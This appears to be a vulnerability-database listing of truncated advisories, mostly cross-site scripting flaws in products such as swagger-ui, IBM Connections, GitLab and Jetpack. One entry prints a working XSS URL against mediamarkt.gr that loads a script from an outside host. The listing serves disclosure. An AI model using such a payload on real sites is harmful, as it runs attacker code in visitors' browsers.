CVE-2015-4591

eClinicalWorks Population Health CCMR suffers from a cross site scripting vulnerability in login.jsp which allows remote unauthenticated users to inject arbitrary javascript via the strMessage parameter...

Cross-Site Scripting (XSS)

swagger-ui is vulnerable to cross-site scripting XSS attacks. A malicious user can inject and execute arbitrary javascript by preappending a tag infront of the arbitrary javascript...

Cross-Site Scripting (XSS)

gon is vulnerable to cross-site scripting XSS attacks. A malicious user can inject and execute arbitrary javascript when prepended with certain unicode characters...

Cross-Site Scripting (XSS)

django-meta is vulnerable to cross-site scripting XSS attacks. A malicious user can inject and execute arbitrary javascript due to the lack of escaping values before rendering...

Code injection

XSS in Yandex Browser Translator in Yandex browser for desktop for versions from 15.12 to 16.2 could be used by remote attacker for evaluation arbitrary javascript code...

Pootle Server < 2.7.3 Multiple XSS Vulnerabilities

Pootle server is prone to multiple cross-site scripting XSS vulnerabilities. Copyright C 2016 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is...

IBM Tealeaf Customer Experience Cross-Site Scripting Vulnerability (CNVD-2016-07822)

IBM Tealeaf Customer Experience is a SaaS Software-as-a-Service based analytics solution for web and mobile applications from IBM, USA. The solution helps clients improve the overall user experience by analyzing and understanding data, and supports the adoption of advanced user interfaces for ric...

WebSummit: Reflected xss on websummit.net

Hey guys, TL;DR: Reflected XSS on websummit.net/attendees/featured-attendees as the q parameter is directly reflecting special characters in the data-url on the handlebars template section of the page, as opposed to URL encoding them. Proof of Concept: Visit...

mediamarkt.gr XSS vulnerability

Vulnerable URL: http://www.mediamarkt.gr/el/search.html?storeId=48353=-3=onlineshop=mmdede===test%27;mcs.jQuery.getScript%22//loshackers.de/a.js%22;%27a%27:%27b Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS Vulnerability status:|...

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06646)

IBM Connections is a suite of social software platforms from IBM in the United States. The platform provides advanced analytics and real-time data monitoring capabilities, and accelerates web collaboration within and outside the organization through IBM SmartCloud services. A cross-site scripting...

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06536)

IBM Connections is a suite of social software platforms from IBM in the United States. The platform provides advanced analytics and real-time data monitoring capabilities, and accelerates web collaboration within and outside the organization through IBM SmartCloud services. A cross-site scripting...

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06535)

IBM Connections is a suite of social software platforms from IBM in the United States. The platform provides advanced analytics and real-time data monitoring capabilities, and accelerates web collaboration within and outside the organization through IBM SmartCloud services. A cross-site scripting...

Cross-Site Scripting

Overview Affected versions of sanitize-html do not sanitize input recursively, which may allow an attacker to execute arbitrary Javascript. Recommendation Update to version 1.4.3 or later. References - Issue 29 - GitHub Advisory...

Securimage Cross-Site Scripting Vulnerability

Securimage is an open source free PHP CAPTCHA script for generating complex CAPTCHA images and CAPTCHA code. Securimage suffers from a cross-site scripting vulnerability that could allow an attacker to execute arbitrary JavaScript code in a user's browser...

GitLab: Persistent XSS on public project page

Details A project admin can set up a custom issue tracker integration. This setting misses a check to make sure that it's a real URL and, thus, can use the javascript handler to execute arbitrary Javascript. Browsers use this handler to execute inline Javascript. This can lead to an account take...

Securimage Cross-Scripting Vulnerability

Securimage is an open source PHP CAPTCHA script for generating CAPTCHA images and CAPTCHA code . Securimage suffers from a cross-scripting vulnerability. An attacker exploits the vulnerability to inject arbitrary JavaScript code via a specially crafted URL, resulting in a cross-site scripting XSS...

WordPress Jetpack Plugin <= 3.9.1 - Cross Site Scripting

Because of this vulnerability, the attackers can inject arbitrary JavaScript or HTML code. Solution Update the plugin...

Ember.js XSS Vulnerability with User-Supplied JSON

By default, Ember will escape any values in Handlebars templates that use double curlies value. Developers can specifically opt out of this escaping behavior by passing an instance of SafeString rather than a raw string, which tells Ember that it should not escape the string because the developer...

Vulnerability in Samsung SecEmailUI

Samsung SecEmailUI is a set of apk for email reader for email client from Samsung South Korea. A security vulnerability exists in Samsung SecEmailUI. The vulnerability can be exploited by an attacker to execute arbitrary JavaScript code by tricking a user into viewing an email with HTML code tags...

Apache Cordova Whitelist Bypass Vulnerability

Cordova is to build native mobile applications with HTML, CSS, JavaScript. A security vulnerability exists in Cordova Android 3.7.2 and earlier versions. Because whitelisting restrictions are not properly applied, an attacker can bypass the whitelist and execute arbitrary Javascript using a...